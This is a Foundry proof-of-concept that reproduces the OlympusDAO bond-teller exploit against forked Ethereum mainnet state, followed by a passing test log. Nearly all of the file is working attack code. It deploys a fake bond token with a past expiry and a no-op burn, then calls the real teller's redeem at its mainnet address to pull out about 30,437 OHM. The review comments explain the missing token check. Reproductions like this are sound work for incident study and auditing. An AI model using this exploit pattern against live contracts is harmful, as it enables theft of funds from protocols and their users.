Proof of Concept for OlympusDAO hack using Foundry
// author: https://github.com/jackerleon
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.16;
import "forge-std/Test.sol";
/// @notice Read-only subset of the ERC-20 interface declared for this test.
/// @dev    Of the four getters, the test contract in this file calls only
///         `balanceOf` and `decimals`; `name` and `symbol` are declared but unused here.
interface IERC20 {
    /// @return The token's name string.
    function name() external view returns (string memory);

    /// @return The token's ticker symbol string.
    function symbol() external view returns (string memory);

    /// @param owner Account whose balance is queried.
    /// @return Balance of `owner` in the token's smallest unit.
    function balanceOf(address owner) external view returns (uint256);

    /// @return Number of decimals used when formatting balances for display.
    function decimals() external view returns (uint8);
}
/// @notice The one teller function this reproduction calls.
/// @dev    Only the signature is declared here; the teller's implementation is not
///         part of this file. NOTE(review): the first argument is a caller-supplied
///         address. A teller that acts on it should first confirm the address is a
///         bond token it issued itself (for example by checking a registry of tokens
///         it deployed) before burning or paying out. Verify against the deployed
///         teller source.
interface IBondFixedExpiryTeller {
    /// @param token_  Address the teller is asked to treat as a bond token.
    /// @param amount_ Amount to redeem (presumably in the token's smallest unit; confirm).
    function redeem(address token_, uint256 amount_) external;
}
/// @notice Stand-in "bond token" used by the reproduction test in this file.
/// @dev    It exposes exactly three functions: `underlying`, `expiry` and `burn`.
///         None of them proves that the contract was issued by the teller.
///         The test passes with only this surface, which suggests the teller
///         trusts whatever the supplied token reports about itself (inferred
///         from the test outcome, not from teller source; confirm).
///         Defensive takeaway: a redeem path must authenticate the token address
///         before relying on values the token returns.
contract AttackTokenContract {
    // OHM token address; reported to the caller as this contract's underlying asset.
    IERC20 OHM = IERC20(0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5);

    /// @notice Reports OHM as the asset backing this token.
    /// @return Address of the OHM token contract.
    function underlying() external view returns (address) {
        address backing = address(OHM);
        return backing;
    }

    /// @notice Reports a fixed expiry of 1, a timestamp long in the past relative
    ///         to any block on the forked chain.
    /// @return _expiry Always 1.
    function expiry() external pure returns (uint48 _expiry) {
        _expiry = 1;
    }

    /// @notice Deliberate no-op: accepts any arguments and neither destroys tokens nor reverts.
    function burn(address, uint256) external {}
}
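/// @notice Foundry fork test that reproduces the OlympusDAO bond-teller incident
///         against historical mainnet state.
/// @dev    Requires an RPC endpoint registered under the alias "mainnet" (e.g. in
///         foundry.toml) that can serve state at the pinned block; an archive node
///         is presumably needed. All state changes happen on the local fork only.
///         Root cause as far as this file shows: `redeem` accepts an arbitrary
///         token address and the call succeeds for a contract the teller never
///         issued. The fix belongs in the teller, which should reject tokens
///         missing from its own record of deployed bond tokens.
contract OlympusDAO is Test {
    // Teller contract under test.
    IBondFixedExpiryTeller bondExpTeller = IBondFixedExpiryTeller(0x007FE7c498A2Cf30971ad8f2cbC36bd14Ac51156);
    // OHM token, the asset whose balance is observed.
    IERC20 OHM = IERC20(0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5);

    /// @notice Forks mainnet at a fixed block so the run is reproducible.
    function setUp() public {
        vm.createSelectFork("mainnet", 15_794_363);
    }

    /// @notice Redeems against an unregistered token and checks the resulting OHM balance change.
    /// @dev    The original version only logged balances, so it passed whenever
    ///         `redeem` did not revert, even if nothing was paid out. The assertion
    ///         below pins the observed outcome so the test fails if the behaviour
    ///         differs (for example on a fork where the teller has been fixed or drained).
    function testHack() public {
        // Amount passed to redeem, in OHM's smallest unit.
        uint256 redeemAmount = 30_437_077_948_152;
        address fakeToken = address(new AttackTokenContract());

        uint8 ohmDecimals = OHM.decimals();
        uint256 balanceBefore = OHM.balanceOf(address(this));
        emit log_named_decimal_uint("[Before Exploit] OHM Balance", balanceBefore, ohmDecimals);

        bondExpTeller.redeem(fakeToken, redeemAmount);

        uint256 balanceAfter = OHM.balanceOf(address(this));
        emit log_named_decimal_uint("[After Exploit] OHM Balance", balanceAfter, ohmDecimals);

        // Checked arithmetic (0.8.x) reverts here if the balance went down,
        // which also fails the test.
        assertEq(
            balanceAfter - balanceBefore,
            redeemAmount,
            "OHM balance delta does not match redeemed amount"
        );
    }
}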
@jackerleon
Author

Running 1 test for test/OlympusDAO/OlympusDAO.sol:OlympusDAO
[PASS] testHack() (gas: 149266)
Logs:
[Before Exploit] OHM Balance: 0.000000000
[After Exploit] OHM Balance: 30437.077948152

Test result: ok. 1 passed; 0 failed; finished in 698.30ms
